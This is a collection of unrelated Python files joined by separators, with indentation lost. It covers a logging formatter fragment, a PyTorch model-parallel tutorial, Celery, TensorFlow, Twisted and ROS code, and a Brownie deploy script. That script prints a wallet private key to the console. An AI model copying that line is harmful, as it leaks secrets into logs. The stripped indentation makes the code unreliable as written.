# colourising formatter adapted from an answer to this question on Stack Overflow
# http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
# terminal escape sequences
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
# pad to fixed width - currently hardwired, should make this dynamic
# maximum width of level names, which is the 8 characters of "CRITICAL"
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
# The background is set with 40 plus the number of the color, and the foreground with 30
record.levelname = self.COLOUR_SEQ % (30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
default = logging.Formatter(fmt, datefmt)
return ColouredFormatter(default)
if __name__ == '__main__':
# some simple tests
# tell the built-in logger module to use our custom class when instantiating any new logger
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
# a console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
# handler for plotting logger - will write only to console
plotlogger.addHandler(ch)
# # need a handler which will control where to save plots
# ph = PlotHandler("/tmp/plot_test/testing.pdf")
# logger.addHandler(ph)
print("testing the plotting code")
# the first argument is just a key for referring to this plot within the code
# the second argument says what kind of plot we will be making
plotlogger.set_plot_path("./tmp")
logger.create_plot('test plot',MultipleTimeSeriesPlot)
plotlogger.add_plot_point('test plot','validation',(1,4))
plotlogger.add_plot_point('test plot','validation',(3,2))
plotlogger.add_plot_point('test plot','validation',(2,3))
plotlogger.add_plot_point('test plot','validation',(4,3))
plotlogger.add_plot_point('test plot','training',(1,3))
plotlogger.add_plot_point('test plot','training',(3,1))
plotlogger.add_plot_point('test plot','training',(2,2))
plotlogger.add_plot_point('test plot','training',(4,4))
plotlogger.save_plot('test plot',title='Training and validation error',xlabel='epochs',ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
|
# -*- coding: utf-8 -*-
"""
Model Parallel Best Practices
*************************************************************
**Author**: `Shen Li <https://mrshenli.github.io/>`_
Data parallel and model parallel are widely-used in distributed training
techniques. Previous posts have explained how to use
`DataParallel <https://pytorch.org/tutorials/beginner/blitz/data_parallel_tutorial.html>`_
to train a neural network on multiple GPUs. ``DataParallel`` replicates the
same model to all GPUs, where each GPU consumes a different partition of the
input data. Although it can significantly accelerate the training process, it
does not work for some use cases where the model is too large to fit into a
single GPU. This post shows how to solve that problem by using model parallel
and also shares some insights on how to speed up model parallel training.
The high-level idea of model parallel is to place different sub-networks of a
model onto different devices, and implement the ``forward`` method accordingly
to move intermediate outputs across devices. As only part of a model operates
on any individual device, a set of devices can collectively serve a larger
model. In this post, we will not try to construct huge models and squeeze them
into a limited number of GPUs. Instead, this post focuses on showing the idea
of model parallel. It is up to the readers to apply the ideas to real-world
applications.
**Recommended Reading:**
- https://pytorch.org/ For installation instructions
- :doc:`/beginner/blitz/data_parallel_tutorial` Single-Machine Data Parallel
- :doc:`/intermediate/ddp_tutorial` Combine Distributed Data Parallel and Model Parallel
"""
######################################################################
# Basic Usage
# =======================
#
# Let us start with a toy model that contains two linear layers. To run this
# model on two GPUs, simply put each linear layer on a different GPU, and move
# inputs and intermediate outputs to match the layer devices accordingly.
import torch
import torch.nn as nn
import torch.optim as optim
class ToyModel(nn.Module):
def __init__(self):
super(ToyModel, self).__init__()
self.net1 = torch.nn.Linear(10, 10).to('cuda:0')
self.relu = torch.nn.ReLU()
self.net2 = torch.nn.Linear(10, 5).to('cuda:1')
def forward(self, x):
x = self.relu(self.net1(x.to('cuda:0')))
return self.net2(x.to('cuda:1'))
######################################################################
# Note that, the above ``ToyModel`` looks very similar to how one would
# implement it on a single GPU, except the five ``to(device)`` calls which
# place linear layers and tensors on proper devices. That is the only place in
# the model that requires changes. The ``backward()`` and ``torch.optim`` will
# automatically take care of gradients as if the model is on one GPU. You only
# need to make sure that the labels are on the same device as the outputs when
# calling the loss function.
model = ToyModel()
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
optimizer.zero_grad()
outputs = model(torch.randn(20, 10))
labels = torch.randn(20, 5).to('cuda:1')
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# Apply Model Parallel to Existing Modules
# =======================
#
# It is also possible to run an existing single-GPU module on multiple GPUs
# with just a few lines of changes. The code below shows how to decompose
# ``torchvision.models.reset50()`` to two GPUs. The idea is to inherit from
# the existing ``ResNet`` module, and split the layers to two GPUs during
# construction. Then, override the ``forward`` method to stitch two
# sub-networks by moving the intermediate outputs accordingly.
from torchvision.models.resnet import ResNet, Bottleneck
num_classes = 1000
class ModelParallelResNet50(ResNet):
def __init__(self, *args, **kwargs):
super(ModelParallelResNet50, self).__init__(
Bottleneck, [3, 4, 6, 3], num_classes=num_classes, *args, **kwargs)
self.seq1 = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2
).to('cuda:0')
self.seq2 = nn.Sequential(
self.layer3,
self.layer4,
self.avgpool,
).to('cuda:1')
self.fc.to('cuda:1')
def forward(self, x):
x = self.seq2(self.seq1(x).to('cuda:1'))
return self.fc(x.view(x.size(0), -1))
######################################################################
# The above implementation solves the problem for cases where the model is too
# large to fit into a single GPU. However, you might have already noticed that
# it will be slower than running it on a single GPU if your model fits. It is
# because, at any point in time, only one of the two GPUs are working, while
# the other one is sitting there doing nothing. The performance further
# deteriorates as the intermediate outputs need to be copied from ``cuda:0`` to
# ``cuda:1`` between ``layer2`` and ``layer3``.
#
# Let us run an experiment to get a more quantitative view of the execution
# time. In this experiment, we train ``ModelParallelResNet50`` and the existing
# ``torchvision.models.reset50()`` by running random inputs and labels through
# them. After the training, the models will not produce any useful predictions,
# but we can get a reasonable understanding of the execution times.
import torchvision.models as models
num_batches = 3
batch_size = 120
image_w = 128
image_h = 128
def train(model):
model.train(True)
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
one_hot_indices = torch.LongTensor(batch_size) \
.random_(0, num_classes) \
.view(batch_size, 1)
for _ in range(num_batches):
# generate random inputs and labels
inputs = torch.randn(batch_size, 3, image_w, image_h)
labels = torch.zeros(batch_size, num_classes) \
.scatter_(1, one_hot_indices, 1)
# run forward pass
optimizer.zero_grad()
outputs = model(inputs.to('cuda:0'))
# run backward pass
labels = labels.to(outputs.device)
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# The ``train(model)`` method above uses ``nn.MSELoss`` as the loss function,
# and ``optim.SGD`` as the optimizer. It mimics training on ``128 X 128``
# images which are organized into 3 batches where each batch contains 120
# images. Then, we use ``timeit`` to run the ``train(model)`` method 10 times
# and plot the execution times with standard deviations.
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
import numpy as np
import timeit
num_repeat = 10
stmt = "train(model)"
setup = "model = ModelParallelResNet50()"
# globals arg is only available in Python 3. In Python 2, use the following
# import __builtin__
# __builtin__.__dict__.update(locals())
mp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
mp_mean, mp_std = np.mean(mp_run_times), np.std(mp_run_times)
setup = "import torchvision.models as models;" + \
"model = models.resnet50(num_classes=num_classes).to('cuda:0')"
rn_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
rn_mean, rn_std = np.mean(rn_run_times), np.std(rn_run_times)
def plot(means, stds, labels, fig_name):
fig, ax = plt.subplots()
ax.bar(np.arange(len(means)), means, yerr=stds,
align='center', alpha=0.5, ecolor='red', capsize=10, width=0.6)
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xticks(np.arange(len(means)))
ax.set_xticklabels(labels)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig(fig_name)
plt.close(fig)
plot([mp_mean, rn_mean],
[mp_std, rn_std],
['Model Parallel', 'Single GPU'],
'mp_vs_rn.png')
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn.png
# :alt:
#
# The result shows that the execution time of model parallel implementation is
# ``4.02/3.75-1=7%`` longer than the existing single-GPU implementation. So we
# can conclude there is roughly 7% overhead in copying tensors back and forth
# across the GPUs. There are rooms for improvements, as we know one of the two
# GPUs is sitting idle throughout the execution. One option is to further
# divide each batch into a pipeline of splits, such that when one split reaches
# the second sub-network, the following split can be fed into the first
# sub-network. In this way, two consecutive splits can run concurrently on two
# GPUs.
######################################################################
# Speed Up by Pipelining Inputs
# =======================
#
# In the following experiments, we further divide each 120-image batch into
# 20-image splits. As PyTorch launches CUDA operations asynchronizely, the
# implementation does not need to spawn multiple threads to achieve
# concurrency.
class PipelineParallelResNet50(ModelParallelResNet50):
def __init__(self, split_size=20, *args, **kwargs):
super(PipelineParallelResNet50, self).__init__(*args, **kwargs)
self.split_size = split_size
def forward(self, x):
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.seq1(s_next).to('cuda:1')
ret = []
for s_next in splits:
# A. s_prev runs on cuda:1
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
# B. s_next runs on cuda:0, which can run concurrently with A
s_prev = self.seq1(s_next).to('cuda:1')
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
return torch.cat(ret)
setup = "model = PipelineParallelResNet50()"
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
pp_mean, pp_std = np.mean(pp_run_times), np.std(pp_run_times)
plot([mp_mean, rn_mean, pp_mean],
[mp_std, rn_std, pp_std],
['Model Parallel', 'Single GPU', 'Pipelining Model Parallel'],
'mp_vs_rn_vs_pp.png')
######################################################################
# Please note, device-to-device tensor copy operations are synchronized on
# current streams on the source and the destination devices. If you create
# multiple streams, you have to make sure that copy operations are properly
# synchronized. Writing the source tensor or reading/writing the destination
# tensor before finishing the copy operation can lead to undefined behavior.
# The above implementation only uses default streams on both source and
# destination devices, hence it is not necessary to enforce additional
# synchronizations.
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn_vs_pp.png
# :alt:
#
# The experiment result shows that, pipelining inputs to model parallel
# ResNet50 speeds up the training process by roughly ``3.75/2.51-1=49%``. It is
# still quite far away from the ideal 100% speedup. As we have introduced a new
# parameter ``split_sizes`` in our pipeline parallel implementation, it is
# unclear how the new parameter affects the overall training time. Intuitively
# speaking, using small ``split_size`` leads to many tiny CUDA kernel launch,
# while using large ``split_size`` results to relatively long idle times during
# the first and last splits. Neither are optimal. There might be an optimal
# ``split_size`` configuration for this specific experiment. Let us try to find
# it by running experiments using several different ``split_size`` values.
means = []
stds = []
split_sizes = [1, 3, 5, 8, 10, 12, 20, 40, 60]
for split_size in split_sizes:
setup = "model = PipelineParallelResNet50(split_size=%d)" % split_size
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
means.append(np.mean(pp_run_times))
stds.append(np.std(pp_run_times))
fig, ax = plt.subplots()
ax.plot(split_sizes, means)
ax.errorbar(split_sizes, means, yerr=stds, ecolor='red', fmt='ro')
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xlabel('Pipeline Split Size')
ax.set_xticks(split_sizes)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig("split_size_tradeoff.png")
plt.close(fig)
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/split_size_tradeoff.png
# :alt:
#
# The result shows that setting ``split_size`` to 12 achieves the fastest
# training speed, which leads to ``3.75/2.43-1=54%`` speedup. There are
# still opportunities to further accelerate the training process. For example,
# all operations on ``cuda:0`` is placed on its default stream. It means that
# computations on the next split cannot overlap with the copy operation of the
# prev split. However, as prev and next splits are different tensors, there is
# no problem to overlap one's computation with the other one's copy. The
# implementation need to use multiple streams on both GPUs, and different
# sub-network structures require different stream management strategies. As no
# general multi-stream solution works for all model parallel use cases, we will
# not discuss it in this tutorial.
|
# -*- coding: utf-8 -*-
from celery import Celery
import config
if config.REDIS_PASSWD:
redis_url = "redis://:{0}@{1}:{2}/{3}".format(
config.REDIS_PASSWD,
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
else:
redis_url = "redis://{0}:{1}/{2}".format(
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
celery_app = Celery(
broker=redis_url,
backend=redis_url,
)
celery_app.conf.update(
task_serializer="json",
accept_content=["json"],
result_serializer="json",
timezone="Asia/Shanghai",
enable_utc=True,
)
celery_app.autodiscover_tasks([
"tasks",
], force=True)
celery_app.conf.beat_schedule = {
"parse_log": {
"task": "parse_log",
"schedule": 30
}
}
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests NCF."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import mock
import numpy as np
import tensorflow as tf
from absl import flags
from absl.testing import flagsaver
from official.recommendation import constants as rconst
from official.recommendation import data_preprocessing
from official.recommendation import neumf_model
from official.recommendation import ncf_main
from official.recommendation import stat_utils
NUM_TRAIN_NEG = 4
class NcfTest(tf.test.TestCase):
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
super(NcfTest, cls).setUpClass()
ncf_main.define_ncf_flags()
def setUp(self):
self.top_k_old = rconst.TOP_K
self.num_eval_negatives_old = rconst.NUM_EVAL_NEGATIVES
rconst.NUM_EVAL_NEGATIVES = 2
def tearDown(self):
rconst.NUM_EVAL_NEGATIVES = self.num_eval_negatives_old
rconst.TOP_K = self.top_k_old
def get_hit_rate_and_ndcg(self, predicted_scores_by_user, items_by_user,
top_k=rconst.TOP_K, match_mlperf=False):
rconst.TOP_K = top_k
rconst.NUM_EVAL_NEGATIVES = predicted_scores_by_user.shape[1] - 1
g = tf.Graph()
with g.as_default():
logits = tf.convert_to_tensor(
predicted_scores_by_user.reshape((-1, 1)), tf.float32)
softmax_logits = tf.concat([tf.zeros(logits.shape, dtype=logits.dtype),
logits], axis=1)
duplicate_mask = tf.convert_to_tensor(
stat_utils.mask_duplicates(items_by_user, axis=1), tf.float32)
metric_ops = neumf_model.compute_eval_loss_and_metrics(
logits=logits, softmax_logits=softmax_logits,
duplicate_mask=duplicate_mask, num_training_neg=NUM_TRAIN_NEG,
match_mlperf=match_mlperf).eval_metric_ops
hr = metric_ops[rconst.HR_KEY]
ndcg = metric_ops[rconst.NDCG_KEY]
init = [tf.global_variables_initializer(),
tf.local_variables_initializer()]
with self.test_session(graph=g) as sess:
sess.run(init)
return sess.run([hr[1], ndcg[1]])
def test_hit_rate_and_ndcg(self):
# Test with no duplicate items
predictions = np.array([
[1., 2., 0.], # In top 2
[2., 1., 0.], # In top 1
[0., 2., 1.], # In top 3
[2., 3., 4.] # In top 3
])
items = np.array([
[1, 2, 3],
[2, 3, 1],
[3, 2, 1],
[2, 1, 3],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items. In the MLPerf case, we treat the duplicates as
# a single item. Otherwise, we treat the duplicates as separate items.
predictions = np.array([
[1., 2., 2., 3.], # In top 4. MLPerf: In top 3
[3., 1., 0., 2.], # In top 1. MLPerf: In top 1
[0., 2., 3., 2.], # In top 4. MLPerf: In top 3
[3., 2., 4., 2.] # In top 2. MLPerf: In top 2
])
items = np.array([
[1, 2, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 2],
[4, 3, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(5)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items, where the predictions for the same item can
# differ. In the MLPerf case, we should take the first prediction.
predictions = np.array([
[3., 2., 4., 4.], # In top 3. MLPerf: In top 2
[3., 4., 2., 4.], # In top 3. MLPerf: In top 3
[2., 3., 4., 1.], # In top 3. MLPerf: In top 2
[4., 3., 5., 2.] # In top 2. MLPerf: In top 1
])
items = np.array([
[1, 2, 2, 3],
[4, 3, 3, 2],
[2, 1, 1, 1],
[4, 2, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 0 / 4)
self.assertAlmostEqual(ndcg, 0 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 3 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
_BASE_END_TO_END_FLAGS = {
"batch_size": 1024,
"train_epochs": 1,
"use_synthetic_data": True
}
@flagsaver.flagsaver(**_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end(self):
ncf_main.main(None)
@flagsaver.flagsaver(ml_perf=True, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_mlperf(self):
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_no_estimator(self):
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_while_loop(self):
# We cannot set use_while_loop = True in the flagsaver constructor, because
# if the flagsaver sets it to True before setting use_estimator to False,
# the flag validator will throw an error.
flags.FLAGS.use_while_loop = True
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.test.main()
|
#!/usr/bin/python3
from brownie import AdvancedCollectible, accounts, network, config
from scripts.helpful_scripts import fund_advanced_collectible
def main():
print(config["wallets"]["from_key"])
dev = accounts.add(config["wallets"]["from_key"])
print(network.show_active())
# publish_source = True if os.getenv("ETHERSCAN_TOKEN") else False # Currently having an issue with this
publish_source = False
advanced_collectible = AdvancedCollectible.deploy(
config["networks"][network.show_active()]["vrf_coordinator"],
config["networks"][network.show_active()]["link_token"],
config["networks"][network.show_active()]["keyhash"],
{"from": dev},
publish_source=publish_source,
)
fund_advanced_collectible(advanced_collectible)
return advanced_collectible
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import twisted
from twisted.python import log, usage
from twisted.application.service import MultiService
from echoservice import EchoService
class AppService(MultiService):
"""
Our application service hierarchy.
"""
def startService(self):
# create WebSocket echo service and make it a child of our app service
svc = EchoService(self.port, self.debug)
svc.setName("EchoService")
svc.setServiceParent(self)
MultiService.startService(self)
class Options(usage.Options):
optFlags = [['debug', 'd', 'Emit debug messages']]
optParameters = [["port", "p", 8080, "Listening port (for both Web and WebSocket) - default 8080."]]
def makeService(options):
"""
This will be called from twistd plugin system and we are supposed to
create and return our application service.
"""
# create application service and forward command line options ..
service = AppService()
service.port = int(options['port'])
service.debug = options['debug']
return service
|
#!/usr/bin/env python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import collections
import glob
import logging
import logging.handlers
import mmap
import os
import pprint
import re
import sys
import threading
import rosbag
import rospkg
from topic_bag_checker import TopicBagChecker
from topic_connection import TopicConnection
from verification_report import VerificationReport
# Instance of rospkg.RosPack to find ros packages
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util # pylint: disable=wrong-import-position
## @vars Stores program options
FLAGS = None
## @vars The list of topics not to verify
ILLEGAL_TOPICS = [
'/your/topic'
]
## @vars The list of topics which require a
# special message key comparison function
SPECIAL_TOPICS = [
'/your/topic'
]
# The main logger for the file
_LOGGER = None
# The lock for creating the logger
_LOGGER_LOCK = threading.Lock()
# Named tuple representing a key of a particular message
MessageKey = collections.namedtuple(
'MessageKey', ['seq', 'secs', 'nsecs'])
# Named tuple representing a key of /tf messages
TransformKey = collections.namedtuple(
'TransformKey', ['seq', 'secs', 'nsecs', 'child_frame_id'])
CURRENT_REPORT = None
## Add positional arguments to parser.
# Positional arguments are required and do not use a unique identifier to
# identify them, instead they are differentiated based on their position
# within the command.
# @param parser The ArgumentParser object to add the positional arguments to
# @returns None
def add_positional_arguments(parser):
parser.add_argument(
'directories',
metavar='directory',
nargs='+',
help='Directories of bag files to postprocess'
)
## Add optional arguments to parser.
# Optional arguments are not required and use a unique identifier to
# identify them.
# @param parser The ArgumentParser object to add the optional arguments to
# @returns None
def add_optional_arguments(parser):
parser.add_argument(
'-d', '--debug',
help=argparse.SUPPRESS,
action="store_const",
dest="log_level",
const=logging.DEBUG
)
parser.add_argument(
'-v', '--verbose',
help='Enables verbose mode',
action="store_const",
dest="log_level",
const=logging.INFO,
)
parser.add_argument(
'-t', '--tolerance',
type=int,
default=10,
metavar='T',
help='The tolerance to decide if a gap is missing data, ' \
'or a different publisher'
)
parser.add_argument(
'--log-name',
default='verify_data.log',
metavar='NAME',
help='The name of the log files'
)
parser.add_argument(
'--log-dir',
default=util.clean_directory_name('~/ddr_bags/verify_data_logs/'), # pylint: disable=no-member
metavar='DIR',
help='The directory to store the verify data log files in'
)
parser.add_argument(
'--num-logs',
type=int,
default=10,
metavar='NUM',
help='The number of log files to keep'
)
parser.add_argument(
'--log-size',
type=int,
